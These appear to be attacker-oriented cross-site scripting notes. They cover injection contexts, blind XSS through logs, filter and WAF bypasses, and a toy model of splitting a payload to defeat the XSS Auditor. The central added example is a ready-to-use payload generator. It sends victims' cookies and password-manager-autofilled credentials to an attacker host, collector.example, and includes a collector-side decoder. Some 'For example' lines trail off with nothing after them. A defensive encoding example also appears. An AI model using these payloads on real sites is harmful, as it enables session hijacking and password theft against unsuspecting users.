XSS/Cross Site Scripting
XSS can occur as a result of the following things:
1. The attacker can inject whole HTML tags. The simplest example is the <script> tag, but others work just as well, such as <img src=x onerror=alert(1)>: the image fails to load and the browser runs the onerror handler, so no <script> tag is needed at all.
2. The attacker can inject text inside a tag that already exists, typically into an attribute value. For example, the page contains <img src=ATTACKER_INPUT_HERE> with an unquoted attribute, and the attacker injects x onerror=alert(1). The space ends the src value and the rest becomes a new event-handler attribute.
3. The attacker can inject a malicious URL into an href or src. For example, <a href="javascript:alert(1)">click me</a> runs the script when the link is clicked.
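The three contexts above, as an added example that is not from the original notes: a toy server-side template renders attacker-controlled values into a text node, an unquoted attribute and a link target. renderUnsafe() reproduces the vulnerable patterns; renderSafe() shows that the fix differs per context (HTML-encode text, quote and encode attributes, allowlist URL schemes). The inputs and the page layout are constructed for the demo.

```javascript
// Added example, not code from the original notes. Context-aware output
// encoding for the three XSS injection contexts listed above.

// Encoder for HTML text and (quoted) attribute contexts.
function encodeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// URL context: encoding alone does not help, because javascript: is a
// perfectly valid attribute value. Allowlist http(s) and relative URLs
// (deliberately strict) and replace anything else with a harmless value.
function safeUrl(s) {
  const u = String(s).trim();
  if (/^(https?:)?\/\//i.test(u) || /^[/?#]/.test(u)) return u;
  return 'about:blank';
}

// Vulnerable rendering: text dropped into the body, an unquoted src
// attribute, and an href taken straight from the user.
function renderUnsafe({ comment, avatar, link }) {
  return `<p>${comment}</p>` +
         `<img src=${avatar}>` +
         `<a href="${link}">click me</a>`;
}

// Hardened rendering. Note the avatar value is left readable: once the
// attribute is quoted and encoded, "x onerror=alert(1)" is just an odd
// image URL, not a second attribute.
function renderSafe({ comment, avatar, link }) {
  return `<p>${encodeHtml(comment)}</p>` +
         `<img src="${encodeHtml(avatar)}">` +
         `<a href="${encodeHtml(safeUrl(link))}">click me</a>`;
}

// Constructed attacker inputs, one per context.
const attackerInput = {
  comment: '<img src=x onerror=alert(1)>',   // context 1: tag injection
  avatar:  'x onerror=alert(1)',             // context 2: attribute injection
  link:    'javascript:alert(1)',            // context 3: URL injection
};

console.log('unsafe:', renderUnsafe(attackerInput));
console.log('safe:  ', renderSafe(attackerInput));
```

The unsafe output contains two live onerror handlers and a javascript: link; the safe output contains none, and each fix is specific to where the input landed, which is why a single global "sanitize" call is usually the wrong tool.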
You can try to sneak XSS payloads into logs. If the application that renders the logs (an admin dashboard or log viewer) treats the entries as HTML instead of encoding them, the payload runs in the browser of whoever opens the logs. This is blind: you won't see it fire yourself, so use a payload that calls back to a server you control.
If the User-Agent header is logged, putting the payload there is an easy way to get JavaScript into the log file, since it is almost always recorded and rarely validated.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
Here are some common ones:
If cookies are accessible from JavaScript (no HttpOnly flag), you can read document.cookie and send it in a GET request to a site you control. Note that HttpOnly only stops the cookie from being read; XSS can still make authenticated requests from the victim's browser, where the cookie is attached automatically.
If you need a site for catching cookies, https://requestcatcher.com/ should be useful.
TODO: Link phishing page under Social Engineering or Web App Hacking?
You can capture a user's password. For example:
Display a fake login page to the user and capture the password if they choose to enter it.
If the victim's browser has saved credentials for the site, inject a login form into the page, wait a moment for the password manager to autofill it, then read the field values and send them to your server. How reliably this works depends on the browser and password manager, some of which require a user gesture before filling.
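Both post-exploitation payloads above (cookie theft and autofill credential capture) share the same exfiltration step, so here is one added example covering both; it is not code from the original notes. COLLECTOR is a hypothetical attacker-controlled host, the element ids, the off-screen styling and the one-second delay are assumptions, and decodeBeacon() is the collector-side view of what arrives.

```javascript
// Added example, not code from the original notes.
// Two XSS post-exploitation payloads built on one shared beacon helper.
const COLLECTOR = 'https://collector.example';   // hypothetical attacker host

// Shared beacon: a GET with the stolen data URL-encoded in the query string.
// new Image() fires the request without the page having to read a response,
// so CORS does not get in the way. fieldsExpr is a JS expression (as a
// string) that evaluates to the "k=v&k2=v2" part in the victim's browser.
function beaconJs(fieldsExpr) {
  return `new Image().src=${JSON.stringify(COLLECTOR + '/?')}+${fieldsExpr};`;
}

// 1. Cookie exfiltration. Only the cookies without HttpOnly show up in
//    document.cookie; the beacon still goes out if that string is empty.
function cookiePayload() {
  return `<script>${beaconJs('"c="+encodeURIComponent(document.cookie)')}</script>`;
}

// 2. Credential capture via the browser's password manager: inject an
//    off-screen login form, give autofill a moment, then beacon the values.
//    The autocomplete attributes help the password manager recognise the
//    form; the delay is an assumption and varies by browser.
function autofillPayload(delayMs = 1000) {
  const grab = beaconJs(
    '"u="+encodeURIComponent(document.getElementById("xu").value)' +
    '+"&p="+encodeURIComponent(document.getElementById("xp").value)');
  return `<form style="position:absolute;left:-9999px">` +
         `<input id="xu" name="username" autocomplete="username">` +
         `<input id="xp" name="password" type="password" autocomplete="current-password">` +
         `</form><script>setTimeout(function(){${grab}},${delayMs})</script>`;
}

// Collector side: turn the beacon URL seen in the request log back into
// the stolen fields. Works for both payloads above.
function decodeBeacon(requestUrl) {
  const out = {};
  for (const [k, v] of new URL(requestUrl).searchParams) out[k] = v;
  return out;
}

console.log(cookiePayload());
console.log(autofillPayload());
```

Drop the returned strings into the injection point; the collector only needs to log request URLs (a request catcher is enough), and decodeBeacon() shows what the logged URL contains.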
This worked against the old Chrome XSS Auditor (removed in Chrome 78) and still works against many reflection-based filters. The bypass needs two query parameters that are both reflected into the page. Neither parameter on its own is a complete script, so a filter that looks for a whole payload in a single parameter, or for a script element that appears verbatim in the URL, sees nothing; once both are reflected, the fragments combine into valid JavaScript.
For example, the first parameter:
The second parameter:
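An added example (not from the original notes) of why the split works, using a toy model of the reflection-matching logic: a vulnerable page reflects two parameters with its own markup in between, and the toy auditor blocks a response only when a reflected <script> element appears contiguously in the decoded request URL. The real XSS Auditor was more involved than this, and Chrome removed it in version 78, so treat the model as an illustration of the matching idea, not as the auditor itself.

```javascript
// Added example, not code from the original notes. Toy model of a
// reflection-matching XSS filter and the two-parameter split that beats it.

// Vulnerable page: reflects ?title= and ?q= with page content in between.
function renderPage(query) {
  const p = new URLSearchParams(query);
  return `<h1>${p.get('title') ?? ''}</h1>\n` +
         `<p>Search results</p>\n` +
         `<p>${p.get('q') ?? ''}</p>`;
}

// Every <script ...>...</script> element in the response.
function scriptBlocks(html) {
  return [...html.matchAll(/<script[^>]*>[\s\S]*?<\/script>/gi)].map(m => m[0]);
}

// Toy auditor (simplification): block if some script element in the
// response is found verbatim in the URL-decoded request.
function toyAuditorBlocks(query, html) {
  const decoded = decodeURIComponent(query);
  return scriptBlocks(html).some(block => decoded.includes(block));
}

// A request is exploitable if a script element is reflected and the
// auditor does not block it.
function exploitable(query) {
  const html = renderPage(query);
  return scriptBlocks(html).length > 0 && !toyAuditorBlocks(query, html);
}

// Single parameter: the whole element is in the URL -> blocked.
const single = 'title=' + encodeURIComponent('<script>alert(1)</script>');

// Split: the script body spans both reflections. The page's own markup
// between them is swallowed by a JS block comment, so the script is still
// valid, but no contiguous copy of the element exists in the URL.
const split = 'title=' + encodeURIComponent('<script>alert(1)/*') +
              '&q='    + encodeURIComponent('*/</script>');

console.log('single exploitable:', exploitable(single));  // false
console.log('split exploitable: ', exploitable(split));   // true
console.log(renderPage(split));
```

The reflected script is alert(1) followed by a block comment containing the page's <h1>/<p> markup, which the JS parser ignores. The same idea applies to any filter that compares request parameters to response fragments one parameter at a time.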
More bypasses: https://www.youtube.com/watch?v=8GwVBpTgR2c
https://materials.rangeforce.com/tutorial/2019/10/23/ModSecurity-Filter-Evasion/
This works against weak ModSecurity rulesets, for example a default install running a low paranoia level: the rules match a fixed set of strings, so case variants and vectors the rules never thought of (event handlers, javascript: URLs) get through.
Simple example:
If the filter strips the malicious string only once (a single pass), try nested payloads: the inner copy is removed and the outer pieces join up into the tag you wanted.
Here are some more interesting payloads: